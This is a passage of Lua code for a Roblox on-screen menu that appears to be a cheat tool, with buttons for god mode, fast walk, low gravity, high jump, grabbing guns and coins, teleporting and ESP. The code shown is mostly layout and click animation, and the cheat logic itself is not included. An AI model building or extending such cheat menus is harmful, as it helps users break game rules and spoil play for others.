generalcoinbutton.BorderSizePixel = 0 generalcoinbutton.ClipsDescendants = true generalcoinbutton.Position = UDim2.new(0, 0, 0, -1) generalcoinbutton.Size = UDim2.new(0, 194, 0, 31) generalcoinbutton.Font = Enum.Font.SourceSansSemibold generalcoinbutton.FontSize = Enum.FontSize.Size24 generalcoinbutton.Text = "Grab 10 Coins" generalcoinbutton.TextColor3 = Color3.new(0, 0.615686, 1) generalcoinbutton.TextSize = 19 generalcoinlabel.Name = "generalcoinlabel" generalcoinlabel.Parent = generalcoinbutton generalcoinlabel.AnchorPoint = Vector2.new(0.5, 0.5) generalcoinlabel.BackgroundColor3 = Color3.new(1, 1, 1) generalcoinlabel.BackgroundTransparency = 1 generalcoinlabel.BorderSizePixel = 0 generalcoinlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) generalcoinlabel.Size = UDim2.new(0, 50, 0, 50) generalcoinlabel.Visible = false generalcoinlabel.Image = "rbxassetid://200182847" generalcoinlabel.ImageColor3 = Color3.new(0, 0.705882, 1) generalcoinlabel.ImageTransparency = 0.80000001192093 generalgunframe.Name = "generalgunframe" generalgunframe.Parent = generalframe generalgunframe.BackgroundColor3 = Color3.new(1, 1, 1) generalgunframe.BorderSizePixel = 0 generalgunframe.Position = UDim2.new(0, 31, 0, 68) generalgunframe.Size = UDim2.new(0, 194, 0, 30) generalgunbutton.Name = "generalgunbutton" generalgunbutton.Parent = generalgunframe generalgunbutton.BackgroundColor3 = Color3.new(1, 1, 1) generalgunbutton.BackgroundTransparency = 1 generalgunbutton.BorderSizePixel = 0 generalgunbutton.ClipsDescendants = true generalgunbutton.Size = UDim2.new(0, 194, 0, 30) generalgunbutton.Font = Enum.Font.SourceSansSemibold generalgunbutton.FontSize = Enum.FontSize.Size24 generalgunbutton.Text = "Grab Gun" generalgunbutton.TextColor3 = Color3.new(0, 0.615686, 1) generalgunbutton.TextSize = 19 generalgunlabel.Name = "generalgunlabel" generalgunlabel.Parent = generalgunbutton generalgunlabel.AnchorPoint = Vector2.new(0.5, 0.5) generalgunlabel.BackgroundColor3 = Color3.new(1, 1, 1) generalgunlabel.BackgroundTransparency = 1 generalgunlabel.BorderSizePixel = 0 generalgunlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) generalgunlabel.Size = UDim2.new(0, 50, 0, 50) generalgunlabel.Visible = false generalgunlabel.Image = "rbxassetid://200182847" generalgunlabel.ImageColor3 = Color3.new(0, 0.705882, 1) generalgunlabel.ImageTransparency = 0.80000001192093 generallobbyframe.Name = "generallobbyframe" generallobbyframe.Parent = generalframe generallobbyframe.BackgroundColor3 = Color3.new(1, 1, 1) generallobbyframe.BorderSizePixel = 0 generallobbyframe.Position = UDim2.new(0, 31, 0, 17) generallobbyframe.Size = UDim2.new(0, 194, 0, 30) generallobbybutton.Name = "generallobbybutton" generallobbybutton.Parent = generallobbyframe generallobbybutton.BackgroundColor3 = Color3.new(1, 1, 1) generallobbybutton.BackgroundTransparency = 1 generallobbybutton.BorderSizePixel = 0 generallobbybutton.ClipsDescendants = true generallobbybutton.Size = UDim2.new(0, 194, 0, 30) generallobbybutton.Font = Enum.Font.SourceSansSemibold generallobbybutton.FontSize = Enum.FontSize.Size24 generallobbybutton.Text = "TP to Lobby" generallobbybutton.TextColor3 = Color3.new(0, 0.615686, 1) generallobbybutton.TextSize = 19 generallobbylabel.Name = "generallobbylabel" generallobbylabel.Parent = generallobbybutton generallobbylabel.AnchorPoint = Vector2.new(0.5, 0.5) generallobbylabel.BackgroundColor3 = Color3.new(1, 1, 1) generallobbylabel.BackgroundTransparency = 1 generallobbylabel.BorderSizePixel = 0 generallobbylabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) generallobbylabel.Size = UDim2.new(0, 50, 0, 50) generallobbylabel.Visible = false generallobbylabel.Image = "rbxassetid://200182847" generallobbylabel.ImageColor3 = Color3.new(0, 0.705882, 1) generallobbylabel.ImageTransparency = 0.80000001192093 lpframe.Name = "lpframe" lpframe.Parent = bodyframe lpframe.BackgroundColor3 = Color3.new(1, 1, 1) lpframe.BackgroundTransparency = 1 lpframe.BorderSizePixel = 0 lpframe.Position = UDim2.new(0, 256, 0, 0) lpframe.Size = UDim2.new(0, 256, 0, 222) lpjumpframe.Name = "lpjumpframe" lpjumpframe.Parent = lpframe lpjumpframe.BackgroundColor3 = Color3.new(1, 1, 1) lpjumpframe.BorderSizePixel = 0 lpjumpframe.Position = UDim2.new(0, 31, 0, 172) lpjumpframe.Size = UDim2.new(0, 194, 0, 30) lpjumpbutton.Name = "lpjumpbutton" lpjumpbutton.Parent = lpjumpframe lpjumpbutton.BackgroundColor3 = Color3.new(1, 1, 1) lpjumpbutton.BackgroundTransparency = 1 lpjumpbutton.BorderSizePixel = 0 lpjumpbutton.ClipsDescendants = true lpjumpbutton.Size = UDim2.new(0, 194, 0, 30) lpjumpbutton.Font = Enum.Font.SourceSansSemibold lpjumpbutton.FontSize = Enum.FontSize.Size24 lpjumpbutton.Text = "High Jump" lpjumpbutton.TextColor3 = Color3.new(0, 0.615686, 1) lpjumpbutton.TextSize = 19 lpjumplabel.Name = "lpjumplabel" lpjumplabel.Parent = lpjumpbutton lpjumplabel.AnchorPoint = Vector2.new(0.5, 0.5) lpjumplabel.BackgroundColor3 = Color3.new(1, 1, 1) lpjumplabel.BackgroundTransparency = 1 lpjumplabel.BorderSizePixel = 0 lpjumplabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) lpjumplabel.Size = UDim2.new(0, 50, 0, 50) lpjumplabel.Visible = false lpjumplabel.Image = "rbxassetid://200182847" lpjumplabel.ImageColor3 = Color3.new(0, 0.705882, 1) lpjumplabel.ImageTransparency = 0.80000001192093 lpgravframe.Name = "lpgravframe" lpgravframe.Parent = lpframe lpgravframe.BackgroundColor3 = Color3.new(1, 1, 1) lpgravframe.BorderSizePixel = 0 lpgravframe.Position = UDim2.new(0, 31, 0, 120) lpgravframe.Size = UDim2.new(0, 194, 0, 30) lpgravbutton.Name = "lpgravbutton" lpgravbutton.Parent = lpgravframe lpgravbutton.BackgroundColor3 = Color3.new(1, 1, 1) lpgravbutton.BackgroundTransparency = 1 lpgravbutton.BorderSizePixel = 0 lpgravbutton.ClipsDescendants = true lpgravbutton.Position = UDim2.new(0, 0, 0, -1) lpgravbutton.Size = UDim2.new(0, 194, 0, 31) lpgravbutton.Font = Enum.Font.SourceSansSemibold lpgravbutton.FontSize = Enum.FontSize.Size24 lpgravbutton.Text = "Low Gravity" lpgravbutton.TextColor3 = Color3.new(0, 0.615686, 1) lpgravbutton.TextSize = 19 lpgravlabel.Name = "lpgravlabel" lpgravlabel.Parent = lpgravbutton lpgravlabel.AnchorPoint = Vector2.new(0.5, 0.5) lpgravlabel.BackgroundColor3 = Color3.new(1, 1, 1) lpgravlabel.BackgroundTransparency = 1 lpgravlabel.BorderSizePixel = 0 lpgravlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) lpgravlabel.Size = UDim2.new(0, 50, 0, 50) lpgravlabel.Visible = false lpgravlabel.Image = "rbxassetid://200182847" lpgravlabel.ImageColor3 = Color3.new(0, 0.705882, 1) lpgravlabel.ImageTransparency = 0.80000001192093 lpwalkframe.Name = "lpwalkframe" lpwalkframe.Parent = lpframe lpwalkframe.BackgroundColor3 = Color3.new(1, 1, 1) lpwalkframe.BorderSizePixel = 0 lpwalkframe.Position = UDim2.new(0, 31, 0, 68) lpwalkframe.Size = UDim2.new(0, 194, 0, 30) lpwalkbutton.Name = "lpwalkbutton" lpwalkbutton.Parent = lpwalkframe lpwalkbutton.BackgroundColor3 = Color3.new(1, 1, 1) lpwalkbutton.BackgroundTransparency = 1 lpwalkbutton.BorderSizePixel = 0 lpwalkbutton.ClipsDescendants = true lpwalkbutton.Size = UDim2.new(0, 194, 0, 30) lpwalkbutton.Font = Enum.Font.SourceSansSemibold lpwalkbutton.FontSize = Enum.FontSize.Size24 lpwalkbutton.Text = "Fast Walk" lpwalkbutton.TextColor3 = Color3.new(0, 0.615686, 1) lpwalkbutton.TextSize = 19 lpwalklabel.Name = "lpwalklabel" lpwalklabel.Parent = lpwalkbutton lpwalklabel.AnchorPoint = Vector2.new(0.5, 0.5) lpwalklabel.BackgroundColor3 = Color3.new(1, 1, 1) lpwalklabel.BackgroundTransparency = 1 lpwalklabel.BorderSizePixel = 0 lpwalklabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) lpwalklabel.Size = UDim2.new(0, 50, 0, 50) lpwalklabel.Visible = false lpwalklabel.Image = "rbxassetid://200182847" lpwalklabel.ImageColor3 = Color3.new(0, 0.705882, 1) lpwalklabel.ImageTransparency = 0.80000001192093 lpgodframe.Name = "lpgodframe" lpgodframe.Parent = lpframe lpgodframe.BackgroundColor3 = Color3.new(1, 1, 1) lpgodframe.BorderSizePixel = 0 lpgodframe.Position = UDim2.new(0, 31, 0, 17) lpgodframe.Size = UDim2.new(0, 194, 0, 30) lpgodbutton.Name = "lpgodbutton" lpgodbutton.Parent = lpgodframe lpgodbutton.BackgroundColor3 = Color3.new(1, 1, 1) lpgodbutton.BackgroundTransparency = 1 lpgodbutton.BorderSizePixel = 0 lpgodbutton.ClipsDescendants = true lpgodbutton.Size = UDim2.new(0, 194, 0, 30) lpgodbutton.Font = Enum.Font.SourceSansSemibold lpgodbutton.FontSize = Enum.FontSize.Size24 lpgodbutton.Text = "God Mode" lpgodbutton.TextColor3 = Color3.new(0, 0.615686, 1) lpgodbutton.TextSize = 19 lpgodlabel.Name = "lpgodlabel" lpgodlabel.Parent = lpgodbutton lpgodlabel.AnchorPoint = Vector2.new(0.5, 0.5) lpgodlabel.BackgroundColor3 = Color3.new(1, 1, 1) lpgodlabel.BackgroundTransparency = 1 lpgodlabel.BorderSizePixel = 0 lpgodlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) lpgodlabel.Size = UDim2.new(0, 50, 0, 50) lpgodlabel.Visible = false lpgodlabel.Image = "rbxassetid://200182847" lpgodlabel.ImageColor3 = Color3.new(0, 0.705882, 1) lpgodlabel.ImageTransparency = 0.80000001192093 backbutton1.Name = "backbutton1" backbutton1.Parent = maintab backbutton1.Active = false backbutton1.BackgroundColor3 = Color3.new(0, 0.407843, 0.658824) backbutton1.BackgroundTransparency = 1 backbutton1.BorderSizePixel = 0 backbutton1.ClipsDescendants = true backbutton1.Size = UDim2.new(0, 29, 0, 30) backbutton1.Visible = false backbutton1.AutoButtonColor = false backbutton1.Font = Enum.Font.SourceSansBold backbutton1.FontSize = Enum.FontSize.Size24 backbutton1.Text = "<" backbutton1.TextColor3 = Color3.new(1, 1, 1) backbutton1.TextSize = 20 backbutton1label.Name = "backbutton1label" backbutton1label.Parent = backbutton1 backbutton1label.AnchorPoint = Vector2.new(0.5, 0.5) backbutton1label.BackgroundColor3 = Color3.new(1, 1, 1) backbutton1label.BackgroundTransparency = 1 backbutton1label.BorderSizePixel = 0 backbutton1label.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) backbutton1label.Size = UDim2.new(0, 50, 0, 50) backbutton1label.Visible = false backbutton1label.Image = "rbxassetid://200182847" backbutton1label.ImageTransparency = 0.80000001192093 backbutton2.Name = "backbutton2" backbutton2.Parent = maintab backbutton2.Active = false backbutton2.BackgroundColor3 = Color3.new(0, 0.407843, 0.658824) backbutton2.BackgroundTransparency = 1 backbutton2.BorderSizePixel = 0 backbutton2.ClipsDescendants = true backbutton2.Size = UDim2.new(0, 29, 0, 30) backbutton2.Visible = false backbutton2.AutoButtonColor = false backbutton2.Font = Enum.Font.SourceSansBold backbutton2.FontSize = Enum.FontSize.Size24 backbutton2.Text = "<" backbutton2.TextColor3 = Color3.new(1, 1, 1) backbutton2.TextSize = 20 backbutton2label.Name = "backbutton2label" backbutton2label.Parent = backbutton2 backbutton2label.AnchorPoint = Vector2.new(0.5, 0.5) backbutton2label.BackgroundColor3 = Color3.new(1, 1, 1) backbutton2label.BackgroundTransparency = 1 backbutton2label.BorderSizePixel = 0 backbutton2label.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) backbutton2label.Size = UDim2.new(0, 50, 0, 50) backbutton2label.Visible = false backbutton2label.Image = "rbxassetid://200182847" backbutton2label.ImageTransparency = 0.80000001192093 creditsbutton.Name = "creditsbutton" creditsbutton.Parent = maintab creditsbutton.BackgroundColor3 = Color3.new(1, 1, 1) creditsbutton.BackgroundTransparency = 1 creditsbutton.BorderSizePixel = 0 creditsbutton.ClipsDescendants = true creditsbutton.Position = UDim2.new(0.87890625, 0, 0, 0) creditsbutton.Size = UDim2.new(0, 31, 0, 30) creditsbutton.Font = Enum.Font.SourceSansSemibold creditsbutton.FontSize = Enum.FontSize.Size18 creditsbutton.Text = "" creditsbutton.TextColor3 = Color3.new(0, 0.615686, 1) creditsbutton.TextSize = 15 creditsiconlabel1.Name = "creditsiconlabel1" creditsiconlabel1.Parent = creditsbutton creditsiconlabel1.AnchorPoint = Vector2.new(0.5, 0.5) creditsiconlabel1.BackgroundColor3 = Color3.new(1, 1, 1) creditsiconlabel1.BackgroundTransparency = 1 creditsiconlabel1.BorderSizePixel = 0 creditsiconlabel1.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) creditsiconlabel1.Size = UDim2.new(0, 50, 0, 50) creditsiconlabel1.Visible = false creditsiconlabel1.Image = "rbxassetid://200182847" creditsiconlabel1.ImageTransparency = 0.80000001192093 creditsiconlabel2.Name = "creditsiconlabel2" creditsiconlabel2.Parent = creditsbutton creditsiconlabel2.AnchorPoint = Vector2.new(0.5, 0.5) creditsiconlabel2.BackgroundColor3 = Color3.new(1, 1, 1) creditsiconlabel2.BackgroundTransparency = 1 creditsiconlabel2.BorderSizePixel = 0 creditsiconlabel2.Position = UDim2.new(0.5, 0, 0.5, 0) creditsiconlabel2.Size = UDim2.new(0, 17, 0, 17) creditsiconlabel2.Image = "rbxassetid://23151450" toggle.Name = "toggle" toggle.Parent = mygui toggle.Active = true toggle.BackgroundColor3 = Color3.new(0.992157, 0.984314, 1) toggle.BackgroundTransparency = 0.5 toggle.BorderSizePixel = 0 toggle.Draggable = true toggle.Position = UDim2.new(0, 5, 0, 530) toggle.Size = UDim2.new(0, 140, 0, 30) closeall.Name = "closeall" closeall.Parent = toggle closeall.BackgroundColor3 = Color3.new(1, 0, 0) closeall.BorderSizePixel = 0 closeall.Position = UDim2.new(0, 110, 0, 0) closeall.Size = UDim2.new(0, 30, 0, 30) closeall.FontSize = Enum.FontSize.Size18 closeall.Text = "" closeall.TextSize = 15 closeopen.Name = "closeopen" closeopen.Parent = toggle closeopen.BackgroundColor3 = Color3.new(0, 0.615686, 1) closeopen.BorderSizePixel = 0 closeopen.ClipsDescendants = true closeopen.Size = UDim2.new(0, 110, 0, 30) closeopen.AutoButtonColor = false closeopen.Font = Enum.Font.SourceSansBold closeopen.FontSize = Enum.FontSize.Size24 closeopen.Text = "Close" closeopen.TextColor3 = Color3.new(1, 1, 1) closeopen.TextSize = 20 closeopenlabel.Name = "closeopenlabel" closeopenlabel.Parent = closeopen closeopenlabel.AnchorPoint = Vector2.new(0.5, 0.5) closeopenlabel.BackgroundColor3 = Color3.new(1, 1, 1) closeopenlabel.BackgroundTransparency = 1 closeopenlabel.BorderSizePixel = 0 closeopenlabel.Position = UDim2.new(0.840206146, 0, 0.500000477, 0) closeopenlabel.Size = UDim2.new(0, 50, 0, 50) closeopenlabel.Visible = false closeopenlabel.Image = "rbxassetid://200182847" closeopenlabel.ImageTransparency = 0.80000001192093 creditstab.Name = "creditstab" creditstab.Parent = mygui creditstab.Active = true creditstab.BackgroundColor3 = Color3.new(1, 1, 1) creditstab.BackgroundTransparency = 0.5 creditstab.BorderSizePixel = 0 creditstab.Draggable = true creditstab.Position = UDim2.new(0, 42, 0, 47) creditstab.Size = UDim2.new(0, 256, 0, 30) creditstab.Visible = false creditstitle.Name = "creditstitle" creditstitle.Parent = creditstab creditstitle.BackgroundColor3 = Color3.new(0, 0.45098, 0.862745) creditstitle.BorderSizePixel = 0 creditstitle.Position = UDim2.new(-0.001953125, 0, 0, 0) creditstitle.Size = UDim2.new(0, 256, 0, 30) creditstitle.Font = Enum.Font.SourceSansBold creditstitle.FontSize = Enum.FontSize.Size24 creditstitle.Text = "Credits" creditstitle.TextColor3 = Color3.new(1, 1, 1) creditstitle.TextSize = 23 creditsframe.Name = "creditsframe" creditsframe.Parent = creditstab creditsframe.BackgroundColor3 = Color3.new(0, 0.615686, 1) creditsframe.BorderSizePixel = 0 creditsframe.ClipsDescendants = true creditsframe.Position = UDim2.new(0, 0, 0, 30) creditsframe.Size = UDim2.new(0, 256, 0, 222) creditsmenuframe.Name = "menuframe" creditsmenuframe.Parent = creditsframe creditsmenuframe.BackgroundColor3 = Color3.new(1, 1, 1) creditsmenuframe.BackgroundTransparency = 1 creditsmenuframe.BorderSizePixel = 0 creditsmenuframe.Size = UDim2.new(0, 256, 0, 222) creditsfield.Name = "creditsfield" creditsfield.Parent = creditsmenuframe creditsfield.BackgroundColor3 = Color3.new(1, 1, 1) creditsfield.BorderSizePixel = 0 creditsfield.Position = UDim2.new(0, 31, 0, 31) creditsfield.Size = UDim2.new(0, 194, 0, 31) creditsfield.Font = Enum.Font.SourceSansSemibold creditsfield.FontSize = Enum.FontSize.Size24 creditsfield.Text = "By: abs_0" creditsfield.TextColor3 = Color3.new(0, 0.615686, 1) creditsfield.TextSize = 20 closecredits.Name = "closeall" closecredits.Parent = creditstab closecredits.BackgroundColor3 = Color3.new(1, 0, 0) closecredits.BorderSizePixel = 0 closecredits.Position = UDim2.new(0, 226, 0, 0) closecredits.Size = UDim2.new(0, 30, 0, 30) closecredits.FontSize = Enum.FontSize.Size18 closecredits.Text = "" closecredits.TextSize = 15 --Appearance Scripts --mygui.maintab.bodyframe.generalframe.generallobbyframe.generallobbybutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() generallobbybutton.MouseButton1Down:connect(function() local x = (mouse.X) - (generallobbybutton.AbsolutePosition.X) local y = (mouse.Y) - (generallobbybutton.AbsolutePosition.Y) generallobbylabel.Position = UDim2.new(0,x,0,y) generallobbylabel.Size = UDim2.new(0,50,0,50) generallobbylabel.ImageTransparency = 0.8 generallobbylabel.Visible = true wait() generallobbylabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) generallobbybutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = generallobbylabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.generalframe.generalgunframe.generalgunbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() generalgunbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (generalgunbutton.AbsolutePosition.X) local y = (mouse.Y) - (generalgunbutton.AbsolutePosition.Y) generalgunlabel.Position = UDim2.new(0,x,0,y) generalgunlabel.Size = UDim2.new(0,50,0,50) generalgunlabel.ImageTransparency = 0.8 generalgunlabel.Visible = true wait() generalgunlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) generalgunbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = generalgunlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.generalframe.generalcoinframe.generalcoinbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() generalcoinbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (generalcoinbutton.AbsolutePosition.X) local y = (mouse.Y) - (generalcoinbutton.AbsolutePosition.Y) generalcoinlabel.Position = UDim2.new(0,x,0,y) generalcoinlabel.Size = UDim2.new(0,50,0,50) generalcoinlabel.ImageTransparency = 0.8 generalcoinlabel.Visible = true wait() generalcoinlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) generalcoinbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = generalcoinlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.generalframe.generalespframe.generalespbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() generalespbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (generalespbutton.AbsolutePosition.X) local y = (mouse.Y) - (generalespbutton.AbsolutePosition.Y) generalesplabel.Position = UDim2.new(0,x,0,y) generalesplabel.Size = UDim2.new(0,50,0,50) generalesplabel.ImageTransparency = 0.8 generalesplabel.Visible = true wait() generalesplabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) generalespbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = generalesplabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.lpframe.lpgodframe.lpgodbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() lpgodbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (lpgodbutton.AbsolutePosition.X) local y = (mouse.Y) - (lpgodbutton.AbsolutePosition.Y) lpgodbutton.lpgodlabel.Position = UDim2.new(0,x,0,y) lpgodbutton.lpgodlabel.Size = UDim2.new(0,50,0,50) lpgodbutton.lpgodlabel.ImageTransparency = 0.8 lpgodbutton.lpgodlabel.Visible = true wait() lpgodbutton.lpgodlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) lpgodbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = lpgodbutton.lpgodlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.lpframe.lpwalkframe.lpwalkbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() lpwalkbutton.MouseButton1Down:connect(function() if game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed == 16 * 5 then lpwalkbutton.TextColor3 = Color3.new(1,128/255,0) lpwalkbutton.lpwalklabel.ImageColor3 = Color3.new(1,128/255,0) else lpwalkbutton.TextColor3 = Color3.new(0,157/255,1) lpwalkbutton.lpwalklabel.ImageColor3 = Color3.new(0,157/255,1) end local x = (mouse.X) - (lpwalkbutton.AbsolutePosition.X) local y = (mouse.Y) - (lpwalkbutton.AbsolutePosition.Y) lpwalkbutton.lpwalklabel.Position = UDim2.new(0,x,0,y) lpwalkbutton.lpwalklabel.Size = UDim2.new(0,50,0,50) lpwalkbutton.lpwalklabel.ImageTransparency = 0.8 lpwalkbutton.lpwalklabel.Visible = true wait() lpwalkbutton.lpwalklabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) lpwalkbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = lpwalkbutton.lpwalklabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.lpframe.lpgravframe.lpgravbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() lpgravbutton.MouseButton1Down:connect(function() if game:GetService("Workspace").Gravity < 196.1 then lpgravbutton.TextColor3 = Color3.new(1,128/255,0) lpgravbutton.lpgravlabel.ImageColor3 = Color3.new(1,128/255,0) else lpgravbutton.TextColor3 = Color3.new(0,157/255,1) lpgravbutton.lpgravlabel.ImageColor3 = Color3.new(0,157/255,1) end local x = (mouse.X) - (lpgravbutton.AbsolutePosition.X) local y = (mouse.Y) - (lpgravbutton.AbsolutePosition.Y) lpgravbutton.lpgravlabel.Position = UDim2.new(0,x,0,y) lpgravbutton.lpgravlabel.Size = UDim2.new(0,50,0,50) lpgravbutton.lpgravlabel.ImageTransparency = 0.8 lpgravbutton.lpgravlabel.Visible = true wait() lpgravbutton.lpgravlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) lpgravbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = lpgravbutton.lpgravlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.lpframe.lpjumpframe.lpjumpbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() lpjumpbutton.MouseButton1Down:connect(function() if game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower == 100 then lpjumpbutton.TextColor3 = Color3.new(1,128/255,0) lpjumpbutton.lpjumplabel.ImageColor3 = Color3.new(1,128/255,0) else lpjumpbutton.TextColor3 = Color3.new(0,157/255,1) lpjumpbutton.lpjumplabel.ImageColor3 = Color3.new(0,157/255,1) end local x = (mouse.X) - (lpjumpbutton.AbsolutePosition.X) local y = (mouse.Y) - (lpjumpbutton.AbsolutePosition.Y) lpjumpbutton.lpjumplabel.Position = UDim2.new(0,x,0,y) lpjumpbutton.lpjumplabel.Size = UDim2.new(0,50,0,50) lpjumpbutton.lpjumplabel.ImageTransparency = 0.8 lpjumpbutton.lpjumplabel.Visible = true wait() lpjumpbutton.lpjumplabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) lpjumpbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = lpjumpbutton.lpjumplabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.menuframe.generalbuttonframe.generalbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() generalbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (generalbutton.AbsolutePosition.X) local y = (mouse.Y) - (generalbutton.AbsolutePosition.Y) generalbutton.generalbuttonlabel.Position = UDim2.new(0,x,0,y) generalbutton.generalbuttonlabel.Size = UDim2.new(0,50,0,50) generalbutton.generalbuttonlabel.ImageTransparency = 0.8 generalbutton.generalbuttonlabel.Visible = true wait() generalbutton.generalbuttonlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) generalbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = generalbutton.generalbuttonlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.menuframe.generalbuttonframe.generalbutton.TransitionScript generalbutton.MouseButton1Click:connect(function() wait(0.25) menuframe:TweenPosition( UDim2.new(0,-256,0,0), "Out", "Quint", 0.2 ) generalframe:TweenPosition( UDim2.new(0,0,0,0), "Out", "Quint", 0.2 ) backbutton1.Visible = true backbutton1.Active = true maintab.title.Text = "General" maintab.title.TextSize = 19 end) --mygui.maintab.bodyframe.menuframe.lpbuttonframe.lpbutton.Script local mouse = game:GetService("Players").LocalPlayer:GetMouse() lpbutton.MouseButton1Down:connect(function() local x = (mouse.X) - (lpbutton.AbsolutePosition.X) local y = (mouse.Y) - (lpbutton.AbsolutePosition.Y) lpbutton.lpbuttonlabel.Position = UDim2.new(0,x,0,y) lpbutton.lpbuttonlabel.Size = UDim2.new(0,50,0,50) lpbutton.lpbuttonlabel.ImageTransparency = 0.8 lpbutton.lpbuttonlabel.Visible = true wait() lpbuttonlabel:TweenSize( UDim2.new(0,390,0,390), "Out", "Quint", 1 ) end) lpbutton.MouseButton1Up:connect(function() wait(0.35) local TweenService = game:GetService("TweenService") local circle = lpbutton.lpbuttonlabel local Info = TweenInfo.new( 0.2, -- Length Enum.EasingStyle.Linear, -- Easing Style Enum.EasingDirection.Out, -- Easing Direction 0, -- Times repeated false, -- Reverse 0 -- Delay ) local Goals = { ImageTransparency = 1; } local tween = TweenService:Create(circle,Info,Goals) tween:Play() end) --mygui.maintab.bodyframe.menuframe.lpbuttonframe.lpbutton.TransitionScript lpbutton.MouseButton1Click:connect(function() wait(0.25) menuframe:TweenPosition( UDim2.new(0,-256,0,0), "Out", "Quint", 0.2 ) lpframe:TweenPosition( UDim2.new(0,0,0,0), "Out", "Quint", 0.2 ) backbutton2.Visible = true backbutton2.Active = true maintab.title.Text = "Local 